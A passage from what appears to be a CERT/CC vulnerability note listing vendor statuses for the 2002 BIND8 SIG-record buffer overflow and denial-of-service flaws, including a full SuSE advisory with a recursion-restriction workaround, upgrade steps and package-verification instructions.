__ Affected\n\nNotified: November 12, 2002 Updated: November 13, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nOlder releases (6.2, 7.0) of Red Hat Linux shipped with versions of BIND which may be vulnerable to these issues however a Red Hat security advisory in July 2002 upgraded all our supported distributions to BIND 9.2.1 which is not vulnerable to these issues.\n\nAll users who have BIND installed should ensure that they are running these updated versions of BIND. \n\n\n<http://rhn.redhat.com/errata/RHSA-2002-133.html> Red Hat Linux \n<http://rhn.redhat.com/errata/RHSA-2002-119.html> Advanced Server 2.1 \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### SuSE Inc. 
__ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`______________________________________________________________________________ \n` \n` SuSE Security Announcement \n` \n` Package: bind8 \nAnnouncement-ID: SuSE-SA:2002:044 \nDate: Wed Nov 13 17:00:00 CET 2002 \nAffected products: (7.0), 7.1, 7.2, 7.3, 8.0, 8.1, \nSuSE Linux Database Server \nSuSE eMail Server III, 3.1 \nSuSE Firewall \nSuSE Linux Enterprise Server for S/390 \nSuSE Linux Connectivity Server \nSuSE Linux Enterprise Server 7 \nSuSE Linux Office Server \nVulnerability Type: remote command execution \nSeverity (1-10): 8 \nSuSE default package: yes \nCross References: CVE CAN-2002-1219, \nCAN-2002-1220, CAN-2002-1221, \n``<http://www.isc.org/products/BIND/bind-security.html>`` \n``<http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469>`` \n` \n` Content of this advisory: \n1) security vulnerability resolved: Remote command execution \nin bind8 name server. \nproblem description, discussion, solution and upgrade information \n2) pending vulnerabilities, solutions, workarounds: BIND4, reports \nof trojanized tcpdump/libpcap \n3) standard appendix (further information) \n` \n`______________________________________________________________________________ \n` \n`1) problem description, brief discussion, solution, upgrade information \n` \n` The security research company ISS (Internet Security Services) \nhas discovered several vulnerabilities in the BIND8 name server, \nincluding a remotely exploitable buffer overflow. \n` \n` Circumstantial evidence suggests that the Internet Software \nConsortium (maintainer of BIND) has been made aware of these issues \nin mid-October. Distributors of Open Source operating systems, \nincluding SuSE, were notified of these vulnerabilities via CERT \napproximately 12 hours before the release of the advisories by ISS \nand ISC on Tue, Nov 12. 
This notification did not include any details \nthat allowed us to identify the vulnerable code, much less prepare \na fix. Mails to ISC went unanswered for 36 hours. \n` \n` The SuSE security team regrets that the Internet Software Consortium \nhas withheld vital information from the Internet community for so long, \nputting the majority of BIND users at risk. We would like to express \nour concern that the approach chosen by ISC and ISS is likely to \nerode trust in the security community if it becomes a model for dealing \nwith security issues. \n` \n` We apologize to SuSE customers for not being able to provide timely \nfixes for this problem. \n` \n` The advisories by ISS and ISC mention the following problems \nin detail: \n` \n` 1. There is a buffer overflow in the way named handles \nSIG records. This buffer overflow can be exploited to \nobtain access to the victim host under the account \nthe named process is running with. \n` \n`In order to exploit this problem, the attacker must \ncontrol an existing DNS domain, and must be allowed \nto perform a recursive query. \n` \n`The impact of this vulnerability is serious. \n` \n`In all SuSE products, named is configured to run as user \"named\" \nby default, so a potential attacker or virus/worm does not get \nimmediate root access. However, this is merely an additional \nobstacle the attacker faces. It may be possible for the attacker \nto exploit other, unpatched local vulnerabilities such as the \nrecently announced traceroute hole to obtain root privilege. It \nmay also be possible for an attacker to obtain increased privilege \nby manipulating the DNS zones served by the victim BIND server. \n` \n`We recommend upgrading to the provided packages. If this is \nnot possible, we recommend restricting recursive requests as a \nworkaround. This can be done by adding a statement such as the \nfollowing to /etc/named.conf: \n` \n`options { \n... existing options ... 
\n` \n`# Restrict recursive queries to 192.168.1.*, \n# except 192.168.1.254. \n# Order does matter. \nallow-recursion { \n!192.168.1.254; \n192.168.1/24; \n}; \n}; \n` \n`Alternatively, you can add \"recursion no;\" to the options \nsection to turn off recursion completely. \n` \n` 2. There are several Denial Of Service problems in BIND8 \nthat allow remote attackers to terminate the name server \nprocess. \n` \n`At least one of these vulnerabilities seems to be exploitable \neven when the attacker is not allowed to perform recursive \nqueries, so that the workaround suggested above is not \neffective against this bug. \n` \n` Both vulnerabilities are addressed by this update, using patches \noriginating from ISC. \n` \n` Due to the severity of this issue, we will provide update packages \nfor SuSE Linux 7.0, even though support for this product has officially \nbeen discontinued. \n` \n` Please download the update package for your distribution and verify its \nintegrity by the methods listed in section 3) of this announcement. \nThen, install the packages using the command \"rpm -Fhv file.rpm\" to apply \nthe update. After updating, make sure to restart the name server \nprocess by issuing the following command as root: \n` \n` rcnamed restart \n` \n` Our maintenance customers are being notified individually. The packages \nare being offered to install from the maintenance web. 
\n` \n
\n`______________________________________________________________________________ \n` \n`2) Pending vulnerabilities in SuSE Distributions and Workarounds: \n` \n` BIND4 \nIn addition to the vulnerabilities in BIND8 discussed above, ISS \nreport several vulnerabilities in BIND4. As stated previously, \nSuSE has discontinued support for BIND4 and recommends that \nusers upgrade to BIND8 as soon as possible. 
\n` \n` Trojaned libpcap/tcpdump \nThere have been reports that the source packages of tcpdump and \nlibpcap available from several FTP servers have been modified to \ninclude a trojan. We have checked our source packages for this \nand found them to be clean. \n` \n`______________________________________________________________________________ \n` \n`3) standard appendix: authenticity verification, additional information \n` \n` - Package authenticity verification: \n` \n` SuSE update packages are available on many mirror ftp servers all over \nthe world. While this service is being considered valuable and important \nto the free and open source software community, many users wish to be \nsure about the origin of the package and its content before installing \nthe package. There are two verification methods that can be used \nindependently from each other to prove the authenticity of a downloaded \nfile or rpm package: \n1) md5sums as provided in the (cryptographically signed) announcement. \n2) using the internal gpg signatures of the rpm package. \n` \n` 1) execute the command \nmd5sum <name-of-the-file.rpm> \nafter you have downloaded the file from a SuSE ftp server or its mirrors. \nThen, compare the resulting md5sum with the one that is listed in the \nannouncement. Since the announcement containing the checksums is \ncryptographically signed (usually using the key security@suse.de), \nthe checksums show proof of the authenticity of the package. \nWe recommend against subscribing to security lists that cause the \nemail message containing the announcement to be modified so that \nthe signature does not match after transport through the mailing \nlist software. \nDownsides: You must be able to verify the authenticity of the \nannouncement in the first place. If RPM packages are being rebuilt \nand a new version of a package is published on the ftp server, all \nmd5 sums for the files are useless. 
\n` \n` 2) rpm package signatures provide an easy way to verify the authenticity \nof an rpm package. Use the command \nrpm -v --checksig <file.rpm> \nto verify the signature of the package, where <file.rpm> is the \nfilename of the rpm package that you have downloaded. Of course, \npackage authenticity verification can only target an un-installed rpm \npackage file. \nPrerequisites: \na) gpg is installed \nb) The package is signed using a certain key. The public part of this \nkey must be installed by the gpg program in the directory \n~/.gnupg/ under the user's home directory who performs the \nsignature verification (usually root). You can import the key \nthat is used by SuSE in rpm packages for SuSE Linux by saving \nthis announcement to a file (\"announcement.txt\") and \nrunning the command (do \"su -\" to be root): \ngpg --batch; gpg < announcement.txt | gpg --import \nSuSE Linux distributions version 7.1 and thereafter install the \nkey \"build@suse.de\" upon installation or upgrade, provided that \nthe package gpg is installed. The file containing the public key \nis placed at the top-level directory of the first CD (pubring.gpg) \nand at ``<ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de>`` . \n` \n \n` - SuSE runs two security mailing lists to which any interested party may \nsubscribe: \n` \n` suse-security@suse.com \n- general/linux/SuSE security discussion. \nAll SuSE security announcements are sent to this list. \nTo subscribe, send an email to \n<suse-security-subscribe@suse.com>. \n` \n` suse-security-announce@suse.com \n- SuSE's announce-only mailing list.` \n` Only SuSE's security announcements are sent to this list. \nTo subscribe, send an email to \n<suse-security-announce-subscribe@suse.com>. \n` \n` For general information or the frequently asked questions (faq) \nsend mail to: \n<suse-security-info@suse.com> or \n<suse-security-faq@suse.com> respectively. 
\n` \n` ===================================================================== \nSuSE's security contact is <security@suse.com> or <security@suse.de>. \nThe <security@suse.de> public key is listed below. \n===================================================================== \n______________________________________________________________________________ \n` \n` The information in this advisory may be distributed or reproduced, \nprovided that the advisory is not modified in any way. In particular, \nit is desired that the clear-text signature shows proof of the \nauthenticity of the text. \nSuSE Linux AG makes no warranties of any kind whatsoever with respect \nto the information contained in this security advisory. \n` \n`Type Bits/KeyID Date User ID \npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de> \npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de> \n` \n`- -----BEGIN PGP PUBLIC KEY BLOCK----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`- -----END PGP PUBLIC KEY BLOCK----- \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`-----END PGP SIGNATURE-----`\n\n### Cray Inc. __ Not Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCray Inc. is not vulnerable.\n\n### InfoBlox __ Not Affected\n\nNotified: November 12, 2002 Updated: October 18, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe Infoblox DNS One product is not vulnerable.\n\n### Microsoft Corporation __ Not Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMicrosoft products do not use the program in question. 
Microsoft products are not affected by this issue.\n\n### MontaVista Software __ Not Affected\n\nNotified: November 12, 2002 Updated: November 13, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMontaVista ships BIND 9, thus is not vulnerable to these advisories.\n\n### Nominum __ Not Affected\n\nNotified: November 12, 2002 Updated: November 13, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNominum \"Foundation\" Authoritative Name Server (ANS) is not affected by this vulnerability. Also, Nominum \"Foundation\" Caching Name Server (CNS) is not affected by this vulnerability. 
Nominum's commercial DNS server products, which are part of Nominum \"Foundation\" IP Address Suite, are not based on BIND and do not contain any BIND code, and so are not affected by vulnerabilities discovered in any version of BIND.\n\n### 3Com Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&T Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Adns Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Aladdin Knowledge Systems Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Apache Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Apache-SSL Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### BSDI Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### BlueCat Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Check Point Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Systems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cistron Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Command Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Compaq Computer Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Computer Associates Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Covalent Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### CyberSoft Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not 
received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### D-Link Systems Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Data Fellows Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Data General Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### F-Secure Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### F5 Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Finjan Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### FreeRADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this 
vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Fujitsu Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Funk Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### GFI Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### GNU glibc Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### 
Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### IPlanet Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Inner Cite Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send 
us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Intel Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Interlink Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Intersoft International Inc. 
Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Jkuo Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Juniper Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### KTH Kerberos Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf 
you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Lachman Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Lotus Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Macromedia Inc. 
Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Mei Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Men&Mice Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### MetaSolv Software Inc. 
Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### MiT Kerberos Development Team Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### NCFTP Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### NCSA Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at 
this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### NEC Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### NeXT Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### NetSNMP Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Network Appliance Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the 
vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Network Associates Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Nixu Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Nokia Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this 